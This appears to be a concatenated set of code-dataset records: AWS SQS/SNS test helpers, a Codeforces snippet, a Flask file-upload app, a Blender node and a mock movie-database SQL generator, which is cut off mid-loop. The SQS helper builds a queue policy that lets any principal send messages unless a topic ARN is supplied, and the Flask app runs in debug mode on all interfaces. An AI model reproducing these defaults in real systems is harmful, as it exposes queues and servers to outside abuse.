is\" + str(message_count))\n    logger.info(\"message count is\" + str(message_count))\n    sqs_client = boto3.client('sqs', region_name='us-west-2')\n    logger.console('Reading and deleting from queue ' + name)\n    sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n    response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n                                          WaitTimeSeconds=20)\n    try:\n        all_messages = response['Messages']\n    except KeyError:\n        logger.info('No messages on the queue!')\n        return True, False, \"No more messages in the queue\"\n    for message in all_messages:\n        MessageId = message['MessageId']\n        logger.info('MessageId is:')\n        logger.info(MessageId)\n        body = message['Body']\n        data = json.loads(body)\n        eventRaw = 
data['Message']\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n eventPID = event['eventData']['productInstance']['productInstanceId']\n logger.info('########## productInstanceId from event is###################### ')\n logger.info(eventPID)\n eventType = event['eventHeader']['eventType']\n if eventPID == producInstanceId and eventType == 'ProductInstanceCharacteristicsUpdateEvent':\n logger.info('found a match of event for given product instance id' + str(eventPID))\n updatedCharacteristics = event['eventData']['updatedCharacteristics']\n for updatedCharacteristic in updatedCharacteristics:\n if updatedCharacteristic['name'] == characteristicsName:\n characteristicsValue = updatedCharacteristic['value']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, characteristicsValue, event\n\n logger.info('Given characteristics is missing in PSM event')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return False, False, event\n logger.info('did not find a match for given prod instance id in PSM SNS' + str(producInstanceId))\n return False, False, all_messages\n\n############## CMS Queue Functions ##############\ndef readAndDeleteMessageCMSWithState(name, contractInstanceId):\n status, sqs_queue = getQueueAttributes(name)\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n try:\n all_messages = response['Messages']\n except KeyError:\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n logger.info('################ line # 331 #########################')\n data = json.loads(body)\n logger.info('################ line # 333 #########################')\n eventRaw = data['Message']\n logger.info('################ line # 334 #########################')\n logger.info('eventRaw is:')\n logger.info(eventRaw)\n logger.info(\"type of eventRaw is\")\n logger.info(type(eventRaw))\n #event = eventRaw\n event = eventRaw.replace(\"'\",\"\")\n logger.info(\"type of event is\")\n logger.info(type(event))\n logger.info('event is:')\n logger.info(event)\n #keyContractId, valueContractId, keyIsSigned, valueIsSigned = re.split('\" |,|: ', event)\n '''\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n body = message['Body']\n data = json.loads(body)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n '''\n parsedEvent = json.loads(event)\n logger.info('parsedEvent is:')\n logger.info('################ line # 335 #########################')\n logger.info(parsedEvent)\n # event = json.loads(event)\n logger.info('################ line # 336 #########################')\n eventContractId = parsedEvent['eventData']['contractId']\n logger.info('################ line # 337 #########################')\n logger.info(\"parsed id is\")\n logger.info(eventContractId)\n 
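# Added note (assumed payload shape): the parsed CMS event is expected to look like\n        # {'eventData': {'contractId': ..., 'eventState': ...}}; contractId is compared with\n        # the contractInstanceId argument and eventState is returned on a match.\n        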
logger.info(\"input id is\")\n logger.info(contractInstanceId)\n if eventContractId == contractInstanceId:\n logger.info('################ line # 338 #########################')\n logger.info('found a match of event for a given contract instance id')\n logger.info(parsedEvent)\n eventState = parsedEvent['eventData']['eventState']\n logger.info('################ line # 399 #########################')\n #parsedIsSigned, rawString3 = re.split('}', valueIsSigned)\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n logger.info('################ line # 403 #########################')\n return True, eventState, parsedEvent\n else:\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n logger.info('did not find a match for contract instance id in CMS SNS' + str(contractInstanceId))\n return False, False, all_messages\n\n\n############## SISM Queue Functions ##############\ndef readAndDeleteMessageSISM(name, productInstanceId):\n status, sqs_queue = getQueueAttributes(name)\n #logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n #logger.info('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n #logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n #logger.info('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n all_messages = response['Messages']\n #logger.info('################ line # 125 #########################')\n except KeyError:\n #logger.info('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n MessageId = message['MessageId']\n logger.info('MessageId is:')\n logger.info(MessageId)\n logger.info(message)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n #logger.console('################ line # 140 #########################')\n eventRaw = data['Message']\n #logger.console('################ line # 213 #########################')\n event = json.loads(eventRaw)\n #logger.console('################ line # 215 #########################')\n # logger.console('event is:')\n # logger.console(event)\n try:\n eventPID = event['eventData']['productInstanceId']\n #logger.console('################ line # 219 #########################')\n except:\n logger.console('Message body is null and does not have eventData')\n logger.console(message)\n #logger.console('################ line # 223 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n continue\n\n # logger.console('################ line # 86 #########################')\n logger.console('########## productInstanceId from event is###################### ')\n logger.console(eventPID)\n 
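# Added note: SISM events expose the state under the event header, not eventData --\n        # event['eventHeader']['newState']['stateType'] is what a successful match returns below.\n        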
#logger.console('################ line # 148 #########################')\n if eventPID == productInstanceId:\n logger.info('found a match of eventfor given product instance id')\n logger.info(event)\n stateType = event['eventHeader']['newState']['stateType']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, stateType, event\n else:\n #logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n #logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(productInstanceId))\n return False, False, all_messages\n\n'''\ndef readAndDeleteMessageSISM(name, productInstanceId):\n stateType = None\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n for message in response['Messages']:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n # logger.console('event is:')\n # logger.console(event)\n eventPID = event['eventData']['productInstanceId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventPID == productInstanceId:\n logger.info('found a match of eventfor given product instance id')\n logger.info(event)\n stateType = event['eventHeader']['newState']['stateType']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, stateType, event\n\n logger.info('did not find a match for product instance id in SSIM SNS' + str(productInstanceId))\n return False, None, None\n'''\n\n############## OM Queue Functions ##############\ndef readAndDeleteMessageOMWithState(name, orderId, expectedEndState):\n status, sqs_queue = getQueueAttributes(name)\n # logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n # logger.console('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n # logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n # logger.console('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n 
all_messages = response['Messages']\n # logger.console('################ line # 125 #########################')\n except KeyError:\n # logger.console('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n logger.info('eventRaw is:')\n logger.info(eventRaw)\n logger.info(\"type of eventRaw is\")\n logger.info(type(eventRaw))\n event = json.loads(eventRaw)\n logger.info('event is:')\n logger.info(event)\n logger.info(\"type of event is\")\n logger.info(type(event))\n eventOrderId = event['eventData']['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n endState = event['eventData']['newState']\n startState = event['eventData']['oldState']\n if endState == expectedEndState:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n else:\n # logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n # logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(orderId))\n return False, False, False, all_messages\n\n'''\ndef readAndDeleteMessageOM(name, orderId):\n status, sqs_queue = getQueueAttributes(name)\n #logger.console('################ line # 110 #########################')\n message_count = sqs_queue['Attributes']['ApproximateNumberOfMessages']\n #logger.console('################ line # 112 #########################')\n logger.console(\"message count is\" + str(message_count))\n logger.info(\"message count is\" + str(message_count))\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n #logger.console('################ line # 118 #########################')\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n #logger.console('################ line # 121 #########################')\n # logger.console('Response of Reading and deleting from queue ' + str(response))\n # logger.console('productInstanceId is' + str(productInstanceId))\n try:\n all_messages = response['Messages']\n #logger.console('################ line # 125 #########################')\n except KeyError:\n #logger.console('################ line # 127 #########################')\n logger.info('No messages on the queue!')\n all_messages = []\n return True, True, \"No more messages in the queue\", all_messages\n\n for message in all_messages:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = 
json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n #logger.info('event is:')\n #logger.info(event)\n eventOrderId = event['eventData']['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n startState = event['eventData']['startState']\n endState = event['eventData']['endState']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n else:\n #logger.console('################ line # 156 #########################')\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n\n #logger.console('################ line # 159 #########################')\n logger.info('did not find a match for product instance id in PSM SNS' + str(orderId))\n return False, False, False, all_messages\n'''\n'''\ndef readAndDeleteMessageOM(name, orderId):\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n logger.console('Reading and deleting from queue ' + name)\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n response = sqs_client.receive_message(QueueUrl=sqs_url, AttributeNames=['All'], MaxNumberOfMessages=10,\n WaitTimeSeconds=20)\n logger.info('Response of Reading and deleting from queue ' + str(response))\n\n for message in response['Messages']:\n # logger.console('################ line # 73 #########################')\n MessageId = message['MessageId']\n logger.console('MessageId is:')\n logger.console(MessageId)\n body = message['Body']\n data = json.loads(body)\n # logger.console('data is:')\n # logger.console(data)\n eventRaw = data['Message']\n event = json.loads(eventRaw)\n # logger.console('event is:')\n # logger.console(event)\n eventOrderId = event['orderId']\n # logger.console('################ line # 86 #########################')\n # logger.console('########## productInstanceId from event is###################### ' + str(eventPID))\n if eventOrderId == orderId:\n logger.console('found a match of eventfor given order id')\n logger.info(event)\n startState = event['startState']\n endState = event['endState']\n sqs_client.delete_message(QueueUrl=sqs_url, ReceiptHandle=message['ReceiptHandle'])\n return True, startState, endState, event\n\n logger.info('did not find a match for order id in OM SNS' + str(orderId))\n\n return False, None, None, None\n\n'''\n\n##### Topic Functions ############\ndef list_topics(params={}):\n sns_client = boto3.client('sns', region_name='us-west-2')\n response = sns_client.list_topics()\n logger.console('Response of listing topics ' + str(response))\n return response\n\n\n\n\n######### Policies ################\n# allow queue to receive from all topics or just the one specified\ndef sqsCreateSnsPolicies(queue_arn,topic_arn=False):\n # don't think Sid matters\n sqs_policy = \\\n { \\\n \"Version\": \"2012-10-17\", \\\n \"Id\": queue_arn+\"/SQSDefaultPolicy\", \\\n \"Statement\": [ \\\n { \\\n \"Sid\": \"Sid1538418341381\", \\\n \"Effect\": \"Allow\", \\\n \"Principal\": { \\\n \"AWS\": \"*\" \\\n }, \\\n \"Action\": \"SQS:SendMessage\", \\\n \"Resource\": queue_arn \\\n } \\\n ] \\\n }\n if topic_arn != False:\n sqs_policy['Statement'][0]['Condition'] = {\"ArnEquals\":{\"aws:SourceArn\":topic_arn}}\n return 
sqs_policy\n\n\ndef addSnsReadPolicy(name, topic_arn):\n try:\n sqs_client = boto3.client('sqs', region_name='us-west-2')\n sqs_url = sqs_client.get_queue_url(QueueName=name)['QueueUrl']\n queue_attributes = sqs_client.get_queue_attributes(QueueUrl=sqs_url, AttributeNames=['QueueArn'])\n sqs_policy = sqsCreateSnsPolicies(queue_attributes['Attributes']['QueueArn'], topic_arn)\n policy_response = sqs_client.set_queue_attributes(QueueUrl=sqs_url,\n Attributes={'Policy': json.dumps(sqs_policy)})\n logger.console('Response of read policy ' + str(policy_response))\n return True, policy_response\n except Exception as e:\n logger.console('Exception while adding sns read policy' + str(e))\n return False, None\n\n\n'''\nif __name__ == '__main__':\n #name = \"beptest_\" + str(random.randint(1, 999999))\n # name = \"beptest_508933\"\n #topic_arn = \"arn:aws:sns:us-west-2:785409038667:pgadekar_test\"\n #topic_arn = \"arn:aws:sns:us-west-2:156734773799:psm-events-dev\"\n #name = \"bepe2e-test\"\n name = \"test\"\n topic_arn = \"arn:aws:sns:us-west-2:972022464428:rsism-events-dev\"\n #createQueue(name)\n\n\n\n #list_topics()\n\n sqs_queue = getQueueAttributes(name)\n #add_sns_read_policy(name, topic_arn)\n\n subscribeSqsQueueToTopic(sqs_queue, topic_arn)\n\n #read(name)\n readAndDeleteMessageSISM(name)\n\n #deleteQueue(name)\n'''\n","sub_path":"common/bep/common/aws/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":37711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504450970","text":"from math import sqrt\nn = int(input())\n\ns = 0\n\nfor i in range(1,int(sqrt(n))+1):\n if n%i==0:\n s += 2\n if i == n/i:\n s -= 1\n if i==1:\n s-=1\nprint(s)","sub_path":"codeforces/random/935a.py","file_name":"935a.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"30689354","text":"import os\nimport socket\nimport time\n#from redis import Redis, RedisError\nfrom flask import Flask, render_template, request, redirect, url_for, flash\nfrom werkzeug.utils import secure_filename\n\nimport gisPlot \nimport model\n\nUPLOAD_FOLDER = './upload'\nALLOWED_EXTENSIONS = set(['txt', 'pws'])\n\n# Connect to Redis\n#redis = Redis(host=\"redis\", db=0, socket_connect_timeout=2, socket_timeout=2)\n\napp = Flask(__name__)\napp.secret_key = 'some_secret'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef uploadFile():\n status = None\n \n if not os.path.isdir('upload'):\n os.mkdir('upload')\n\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('index'))\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(url_for('index'))\n if file and not allowed_file(file.filename):\n flash('Not txt or pws file')\n return redirect(url_for('index'))\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], 'input.pws'))\n status = 'File %s successfully uploaded.' 
% file.filename\n return status\n\n@app.route('/result/')\ndef result():\n gpl = gisPlot.gPlot()\n start_time = time.time()\n plotList = gpl.plotPWS(1)\n dictL = gpl.getFeatures()\n bmList,dRP = gpl.plotBrainMap()\n lrbList,pwS, LR1, LR2, LR3 = gpl.plotLR()\n rtime = (time.time() - start_time)\n\n return render_template('result.html', plotList=plotList,\\\n dictList=dictL, bmList=bmList, dictRelPow=dRP, lrbList=lrbList, powSpecList=pwS, LR1List=LR1, LR2List=LR2,LR3=LR3, rtime=rtime) \n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n status = uploadFile()\n #mFile = model.gFile(app, request.files)\n #status = mFile.upload()\n else:\n status=None\n\n return render_template('form.html', status=status)\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0', port=80, threaded=True)","sub_path":"dockerLivingLab/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"175111410","text":"import bpy, random\nfrom bpy.types import Node\nfrom mn_node_base import AnimationNode\nfrom mn_execution import nodePropertyChanged\n\nclass RandomNumberNode(Node, AnimationNode):\n\tbl_idname = \"RandomNumberNode\"\n\tbl_label = \"Random Number\"\n\t\n\tdef init(self, context):\n\t\tself.inputs.new(\"IntegerSocket\", \"Seed\")\n\t\tself.inputs.new(\"FloatSocket\", \"Min\").number = 0.0\n\t\tself.inputs.new(\"FloatSocket\", \"Max\").number = 1.0\n\t\tself.outputs.new(\"FloatSocket\", \"Float Value\")\n\t\tself.outputs.new(\"IntegerSocket\", \"Integer Value\")\n\t\t\n\tdef execute(self, input):\n\t\toutput = {}\n\t\tseed = input[\"Seed\"]\n\t\tmin = input[\"Min\"]\n\t\tmax = input[\"Max\"]\n\t\trandom.seed(seed)\n\t\toutput[\"Float Value\"] = random.uniform(min, max)\n\t\toutput[\"Integer Value\"] = int(output[\"Float Value\"])\n\t\treturn output\n\t\t\n# register\n################################\n\t\t\ndef register():\n\tbpy.utils.register_module(__name__)\n\ndef unregister():\n\tbpy.utils.unregister_module(__name__)","sub_path":"nodes/input/mn_random_number.py","file_name":"mn_random_number.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"128506043","text":"import json\nimport uuid\nimport names\nimport random\nimport time\nfrom tqdm import tqdm\nimport PrepareSerieData\n\n# https://github.com/FEND16/movie-json-data\n\nwith open(\"moviedata.json\", \"r\") as f:\n\tdata = json.load(f)\n\ntemplate1 = \"\"\"\nINSERT INTO VIDEO_ITEM (ID,TITLE,YEAR,IMAGE_SRC,VIDEO_SRC,IMDB_RATING)\nVALUES ('#id#', '#title#', '#year#', '#img#', 'TearsOfSteel.mp4', 10);\n\nINSERT INTO VIDEO_DESCRIPTION (ID,DESCRIPTION)\nVALUES ('#id#', '#description#');\n\"\"\"\n\ntemplate2 = \"\"\"\nINSERT INTO USER_INFO (ID,USER_NAME)\nVALUES ('#id#', '#username#');\n\"\"\"\n\ntemplate3 = \"\"\"\nINSERT INTO META_DATA (ID,MOVIE_ID,USER_ID,PERCENTAGE_WATCHED,RATING)\nVALUES ('#id#','#mid#','#uid#','#pw#','#r#');\n\"\"\"\n\ntemplate4 = \"\"\"\nINSERT INTO VIDEO_COMMENT (ID,COMMENT_TEXT,LIKES,USER_INFO_ID,TIMESTAMP,VIDEO_ID)\nVALUES ('#COMMENT_ID#','#COMMENT_TEXT#','#LIKES#','#COMMENT_USER#','#TIMESTAMP#','#VIDEO_ID#');\n\"\"\"\n\ntemplate5 = \"\"\"\nINSERT INTO VIDEO_GENRE (ID,GENRE_NAME)\nVALUES ('#GENRE_ID#','#GENRE_NAME#');\n\"\"\"\n\ntemplate6 = \"\"\"\nINSERT INTO VIDEO_ITEM_GENRES (VIDEOS_ID,GENRES_ID)\nVALUES ('#VIDEOS_ID#','#GENRES_ID#');\n\n\"\"\"\n\nmovie_ids = 
[]\nmovie_genres = {}\nuser_ids = []\nuser_names = []\nmovie_meta = []\ngenres = []\ngenre_ids = []\n\nprint(\"\\nPreparing movies...\")\n\nwith open(\"movies.sql\", \"w\") as f:\n\tfor movie in tqdm(data):\n\t\tmovie_id = str(uuid.uuid4())\n\t\tmovie_ids.append(movie_id)\n\t\ttitle = movie['originalTitle'] if movie['originalTitle'] != \"\" else movie['title']\n\t\ttitle = title.replace(\"'\", \"''\")\n\t\tyear = movie['year']\n\t\timg = movie['poster']\n\t\tdesc = movie['storyline'].replace(\"\\n\", \" \").replace(\"'\", \"''\")\n\t\tdesc += \" tags: \"\n\t\tfor genre in movie['genres']:\n\t\t\tdesc += genre.replace(\"'\", \"''\") + \" \"\n\t\tfor actor in movie['actors']:\n\t\t\tdesc += actor.replace(\"'\", \"''\") + \" \"\n\n\t\tinsert = template1.replace('#id#', movie_id)\n\t\tinsert = insert.replace('#title#', title)\n\t\tinsert = insert.replace('#year#', year)\n\t\tinsert = insert.replace('#img#', img)\n\t\tinsert = insert.replace('#description#', desc)\n\n\t\tf.write(insert)\n\t\tmovie_genres[movie_id] = movie['genres']\n\t\tmovie_meta.append([movie_id, movie['year'], movie['genres'], movie['actors'], movie['ratings'], movie['contentRating'], movie['duration'], movie['imdbRating']])\n\ntime.sleep(2)\nprint(\"\\nPreparing movie metadata...\")\n\nwith open(\"movie_meta.csv\", \"a\") as f:\n\tf.write(\"movieId;year;genres[,];actors[,];contentRating;duration;imdbRating\\n\")\n\n\tfor item in tqdm(movie_meta):\n\t\tfor genre in item[2]:\n\t\t\tif genre not in genres:\n\t\t\t\tgenres.append(genre)\n\t\t\t\tgenre_ids.append(str(uuid.uuid4()))\n\t\tf.write(\"%s;\" % item[0])\n\t\tf.write(\"%s;\" % item[1])\n\t\tf.write(\"%s;\" % ','.join(item[2]))\n\t\tf.write(\"%s;\" % ','.join(item[3]))\n\t\tf.write(\"%s;\" % item[5])\n\t\tf.write(\"%s;\" % item[6])\n\t\tf.write(\"%s\\n\" % item[7])\n\ntime.sleep(2)\nprint(\"\\nPreparing users...\")\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor x in tqdm(range(10000)):\n\t\tuser_id = str(uuid.uuid4())\n\t\tname = names.get_full_name().replace(\" \", \"\")\n\n\t\tif name in user_names:\n\t\t\tcontinue\n\t\tuser_names.append(name)\n\t\tuser_ids.append(user_id)\n\t\tinsert = template2.replace('#id#', user_id)\n\t\tinsert = insert.replace('#username#', name)\n\t\tf.write(insert)\n\ntime.sleep(2)\nprint(\"\\nPreparing user meta...\")\n\npws = []\npws.extend(range(1, 20))\npws.extend(range(80, 101))\nhigh = [8, 9, 10]\nmid = [4, 5, 6, 7]\nlow = [1, 2, 3]\n\nind = len(genres)\npicks = []\npbar = tqdm(total=100000)\n\nwith open(\"user_meta.csv\", \"w\") as o:\n\to.write(\"id;userId;movieId;rating\\n\")\n\twith open(\"metadata.sql\", \"w\") as f:\n\t\twhile len(picks) < 100000:\n\t\t\tmeta_id = str(uuid.uuid4())\n\t\t\tuser_id = random.choice(user_ids)\n\t\t\tmovie_id = random.choice(movie_ids)\n\t\t\tkey = user_id + movie_id\n\t\t\tif key not in picks:\n\t\t\t\tpicks.append(key)\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\tpw = random.choice(pws)\n\t\t\tindex = user_ids.index(user_id) % ind\n\t\t\tmg = movie_genres[movie_id]\n\t\t\tgood = genres[index]\n\t\t\tbad = genres[-(index+1)]\n\n\t\t\tif good in mg and bad not in mg:\n\t\t\t\trating = random.choice(high)\n\t\t\telif bad in mg and good not in mg:\n\t\t\t\trating = random.choice(mid)\n\t\t\telse:\n\t\t\t\trating = random.choice(low)\n\n\t\t\tinsert = template3.replace(\"#id#\", meta_id)\n\t\t\tinsert = insert.replace(\"#uid#\", user_id)\n\t\t\tinsert = insert.replace(\"#mid#\", movie_id)\n\t\t\tinsert = insert.replace(\"#pw#\", str(pw))\n\t\t\tinsert = insert.replace(\"#r#\", 
str(rating))\n\t\t\tf.write(insert)\n\t\t\to.write(\"%s;%s;%s;%s\\n\" % (meta_id, user_id, movie_id, rating))\n\t\t\tpbar.update(1)\n\ntime.sleep(2)\nprint(\"\\nPreparing genres...\")\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor genre in tqdm(genres):\n\t\tindex = genres.index(genre)\n\t\tgenre_id = genre_ids[index]\n\t\tinsert = template5.replace(\"#GENRE_ID#\", genre_id)\n\t\tinsert = insert.replace(\"#GENRE_NAME#\", genre)\n\t\tf.write(insert)\n\nwith open(\"movies.sql\", \"a\") as m:\n\tfor movie in tqdm(movie_ids):\n\t\tmovie_id = movie\n\t\tfor genre in movie_genres[movie_id]:\n\t\t\tfor gen in genres:\n\t\t\t\tif gen == genre:\n\t\t\t\t\tindex = genres.index(genre)\n\t\t\t\t\tgenre_id = genre_ids[index]\n\t\t\t\t\tinsert = template6.replace(\"#VIDEOS_ID#\", movie_id)\n\t\t\t\t\tinsert = insert.replace(\"#GENRES_ID#\", genre_id)\n\t\t\t\t\tm.write(insert)\n\ntime.sleep(2)\nprint(\"\\nPreparing video comments...\")\n\ncomment_first = [\"Ik vond de film \", \"De film was \", \"Het is \"]\ncomment_last = [\"leuk\", \"slecht\", \"verrassend\", \"nieuw\"]\n\nwith open(\"movies.sql\", \"a\") as f:\n\tfor x in tqdm(range(10000)):\n\t\tfirst_id = random.randint(0, len(comment_first)-1)\n\t\tlast_id = random.randint(0, len(comment_last)-1)\n\t\tcomment = comment_first[first_id] + comment_last[last_id]\n\n\t\tinsert = template4.replace(\"#COMMENT_ID#\", str(uuid.uuid4()))\n\t\tinsert = insert.replace(\"#COMMENT_TEXT#\", comment)\n\t\tinsert = insert.replace(\"#COMMENT_USER#\", user_ids[random.randint(0, len(user_ids) - 1)])\n\t\tinsert = insert.replace(\"#TIMESTAMP#\", str(random.randint(2000, 2020)) + \"-\" + str(random.randint(1, 12)) + \"-\" + str(random.randint(1, 28)))\n\t\tinsert = insert.replace(\"#LIKES#\", str(random.randint(0, 11)))\n\t\tinsert = insert.replace(\"#VIDEO_ID#\", movie_ids[random.randint(0, len(movie_ids) - 1)])\n\t\tf.write(insert)\n\n\ntime.sleep(2)\nprint(\"\\nAll movie data prepared.\")\ntime.sleep(1)\nprint(\"Fetching serie data...\")\n\n\nprint(\"Preparing serie data...\")\nserieTemplate = \"\"\"\nINSERT INTO VIDEO_SERIE (ID,DESCRIPTION,IMAGE_SRC,IMDBID,TITLE,YEAR)\nVALUES ('#id#', '#description#', '#imagesrc#', '#imdb#', '#title#', '#year#');\n\"\"\"\n\nseasonTemplate = \"\"\"\nINSERT INTO VIDEO_SEASON (ID,SEASON_NUM,SERIE_ID)\nVALUES ('#id#', '#seasonnum#', '#serieid#');\n\"\"\"\n\nvideoItemTemplate = \"\"\"\nINSERT INTO VIDEO_ITEM (ID,TITLE,YEAR,IMAGE_SRC,VIDEO_SRC,TYPE,IMDB_RATING)\nVALUES ('#id#', '#title#', '#year#', '#img#', 'TearsOfSteel.mp4', 'SERIE', '#imdbrating#');\n\nINSERT INTO VIDEO_DESCRIPTION (ID,DESCRIPTION)\nVALUES ('#id#', '#description#');\n\"\"\"\n\nepisodeTemplate = \"\"\"\nINSERT INTO VIDEO_EPISODE (ID,SEASON_ID,VIDEO_ID)\nVALUES ('#id#', '#season#', '#video_id#');\n\"\"\"\n\n\nserieGenreTemplate = \"\"\"\nINSERT INTO VIDEO_SERIE_VIDEO_GENRES (SERIES_ID,VIDEO_GENRES_ID)\nVALUES ('#serieID#', '#genreID#');\n\"\"\"\n\nfinalSeries = PrepareSerieData.fetchSerieData()\n\nwith open(\"series.sql\", \"a\") as s:\n\tfor serie in 